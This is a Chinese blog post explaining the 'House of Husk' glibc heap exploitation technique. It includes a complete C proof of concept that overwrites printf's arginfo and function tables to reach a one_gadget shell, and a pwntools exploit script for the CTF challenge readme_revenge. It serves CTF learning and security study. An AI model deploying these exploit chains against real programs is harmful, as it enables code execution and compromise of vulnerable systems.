【pwn】house of husk

最新推荐文章于 2024-09-13 07:06:52 发布
最新推荐文章于 2024-09-13 07:06:52 发布
阅读量745 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/118682037
版权

1、house of husk

源码分析见参考链接1,可以理解为 printf 针对不同的第一个格式化字符的 vtable,目标就是满足执行此处的条件,同时修改 table 中格式化字符对应的指针处为 onegadget,最后 printf("%格式化字符", 0) 来触发。具体调试 poc.c :

/**
* This is a Proof-of-Concept for House of Husk
* This PoC is supposed to be run with libc-2.27.
*/
#include <stdio.h>
#include <stdlib.h>

#define offset2size(ofs) ((ofs) * 2 - 0x10)
#define MAIN_ARENA       0x3afc40
#define MAIN_ARENA_DELTA 0x60
#define GLOBAL_MAX_FAST  0x3b1940
#define PRINTF_FUNCTABLE 0x3b4658
#define PRINTF_ARGINFO   0x3b0870
#define ONE_GADGET       0xdeec2

int main (void)
{
	unsigned long libc_base;
	char *a[10];
	setbuf(stdout, NULL); // make printf quiet

	/* leak libc */
	a[0] = malloc(0x500); /* UAF chunk */
	a[1] = malloc(offset2size(PRINTF_FUNCTABLE - MAIN_ARENA));
	a[2] = malloc(offset2size(PRINTF_ARGINFO - MAIN_ARENA));
	a[3] = malloc(0x500); /* avoid consolidation */
	free(a[0]);
	libc_base = *(unsigned long*)a[0] - MAIN_ARENA - MAIN_ARENA_DELTA;
	printf("libc @ 0x%lxn", libc_base);

	/* prepare fake printf arginfo table */
	*(unsigned long*)(a[2] + ('S' - 2) * 8) = libc_base + ONE_GADGET;
	//*(unsigned long*)(a[1] + ('S' - 2) * 8) = libc_base + ONE_GADGET;
	//now __printf_arginfo_table['X'] = one_gadget;

	/* unsorted bin attack */
	*(unsigned long*)(a[0] + 8) = libc_base + GLOBAL_MAX_FAST - 0x10;
	a[0] = malloc(0x500); /* overwrite global_max_fast */

	/* overwrite __printf_arginfo_table and __printf_function_table */
	free(a[1]);// __printf_function_table => a heap_addr which is not NULL
	free(a[2]);//__printf_arginfo_table => one_gadget

	/* ignite! */
	printf("%S", 0);

	return 0;
}

由于利用到的两个 table 的地址在 libc 中均在 main_arena 下面,所以可以采用 xx attack 打 global_max_fast,使计算好 size 的 fastbin free 到目标地址,将堆地址写到这两个地方,其中 printf_arginfo_tabel 对应的位置布置好 onegadget,即 getshell。如果利用 printf_function_table 同样原理,布置 onegadget 的时候如下即可:

//*(unsigned long*)(a[1] + ('S' - 2) * 8) = libc_base + ONE_GADGET;

在这里插入图片描述
在这里插入图片描述
效果:
在这里插入图片描述

2、例题 readme_revenge

在这里插入图片描述
程序逻辑很简单,漏洞点肯定在 printf 里。因为程序会调用 arginfo_table[‘s’] 处的函数,所以在这里布置为 stack_chk_fail 的地址,其第一个参数 argv 也在下面可以覆盖到,即 flag 的地址,这样就能通过 stack_chk_fail 来打印 flag。
在这里插入图片描述
调试的时候加上源码调试。

#coding=utf-8
from pwn import *
context.update(arch='amd64',os='linux',log_level='info')
context.terminal = ['tmux','split','-h']
debug = 1
elf = ELF('./readme_revenge')
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
if debug:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    p = process('./readme_revenge')

else:
    libc = ELF('./libc_local')
    p = remote('f.buuoj.cn',20173)

printf_function_table = 0x6b7a28
printf_arginfo_table = 0x6b7aa8
input_addr = 0x6b73e0
stack_chk_fail = 0x4359b0
flag_addr = 0x6b4040
argv_addr = 0x6b7980

def exp():
    #leak libc
    #gdb.attach(p,'b* 0x400a51')
    payload = p64(flag_addr)
    payload = payload.ljust(0x73*8,'\x00')
    payload += p64(stack_chk_fail)
    payload = payload.ljust(argv_addr-input_addr,'\x00')
    payload += p64(input_addr)#arg
    payload = payload.ljust(printf_function_table-input_addr,'\x00')
    payload += p64(1)#func not null
    payload = payload.ljust(printf_arginfo_table-input_addr,'\x00')
    payload += p64(input_addr)#arginfo func
    #raw_input()
    p.sendline(payload)
    p.interactive()

exp()

参考:
【1】
【2】

、皮皮鸭
关注
2.27 house of botcake例题附件
05-31
2.27 house of botcake例题附件
house of husk
qq_61670993的博客
11-21 154
house of husk
2021 祥云杯 pwn PassWordBox_ProVersion
yongbaoii的博客
08-30 367
保护显然是全开。libc给的是2.31 看看比free的多了点啥 具体去看看。 这是菜单。 add fgets那里的问题显然已经没了,size改的比较大,看起来只能申请到large bin那样的大小。 edit 编辑确实是无限编辑。 也不会再有溢出那种东西了。 show 也有输出了。 free free也是正常清理。没有清理指针,只是清理了标志位。 多了一个叫recover的函数 可以让标志位再恢复。 那么我们就可以double free啊等等, 但是呢显然我们能申请到的chunk都很大,所以这道.
HuskHomes 使用与部署指南
最新发布
gitblog_00310的博客
09-13 754
HuskHomes 使用与部署指南 HuskHomes The powerful and intuitive set homes, warps, and teleports plugin/mod 项目地址: https://git...
glibc 2.31 pwn——house of pig原题分析与示例程序
CoLin的pwn小屋
01-09 1136
house of pig题目解析及演示程序
PWNHouse of Lore&House of Rabbit
u014377094的博客
05-04 3909
House of lore House of lore是一种利用small bin的利用方法。 前面我们通过修改unsorted bin与large bin的bk(bk_nextsize)位来造成对”任意“地址的更改。unsorted bin由于修改后,如果无法妥善处理bk指向的chunk的size位、bk位,会造成unsorted bin无法再使用,largebin由于是通过fd_nextsize来便利的,所以下次放入影响会小,而下次取出,假如可取出比修改的chunk小的chunk,还可以继续使用。以
2021-NCTF pwn方向题目复现
Amalllの博客
12-01 3532
周末在学校摸鱼了所以没有参加比赛,赛后看题又一次深刻的感觉到自己有多菜了(被新生赛暴打的大二菜狗子 1、easyheap 算是pwn的签到题目了,从libc2.32起加了一个异或的保护,不过因为uaf漏洞点外加并没有啥其他的限制所以利用起来没有什么难度 from pwn import * context.log_level = 'debug' r = lambda : p.recv() rx = lambda x: p.recv(x) ru = lambda x: p.recvuntil(..
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
2024NKCTF-pwn
03-25
2024NKCTF_pwn
welpwn pwn 入门题
02-11
pwn 入门题
pwn入门题目+exp
01-26
初级的ROP,附有完整exp,可以学一下
linux 堆利用
sky123博客
02-18 5096
堆利用 Unlink 假设正常情况下,每申请一个 chunk 会保存一个指向该 chunk 内存块的指针。 在 chunk1 中构造 fake chunk ,需要注意: 为了绕过 if (__builtin_expect(FD->bk != P || BK->fd != P, 0)) malloc_printerr(check_action, "corrupted double-linked list", P, AV); 令: fake
PWN学习之house of系列
qq_41071646的博客
08-09 1525
最近 在wiki学习了 house of 这些东西 但是一直都没有找到联系的地方, 然后 在一篇博客上发现了上面有讲东西并且练习题 很好 所以我就拿来联系了一把 并且记录一下 大概思路 house of spirit 这个wiki上好像没有 但是利用方法其实还是差不多的 这个主要就是 fastbin的利用 伪造一个堆块 然后让 free到这个堆块 让 伪造堆块进入...
linux IO_FILE 利用
热门推荐
sky123博客
03-29 4万+
基本结构 _IO_FILE_plus 定义如下: struct _IO_FILE_plus { FILE file; const struct _IO_jump_t *vtable; }; 包括一个结构体 file 和一个指针 vtable 。 其中 vtable 指向一个函数指针表,很多 IO_FILE 的攻击都是围绕它展开的。 _IO_FILE_plus 类型的结构有 _IO_2_1_stdin_ 、 _IO_2_1_stdout_ 和 _IO_2_1_stderr_ 。另外有头指针 _IO_
PWN学习之House of 系列】House Of Einherjar
weixin_41748164的博客
01-01 1026
溢出写、off by one、off by null。
攻防世界PWNhouse_of_grey题解
seaaseesa的博客
12-09 1852
house_of_grey 首先,检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下 发现是一个读取文件并显示的程序,除了flag文件,其他文件都可以读取 程序有个缓冲区溢出漏洞 可以溢出,修改v8指针,然后我们就可以利用功能4,实现任意地址写 由于可以读取除了flag之外的文件,那么我们可以读取/proc/self/maps文件 Linux 内核提...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值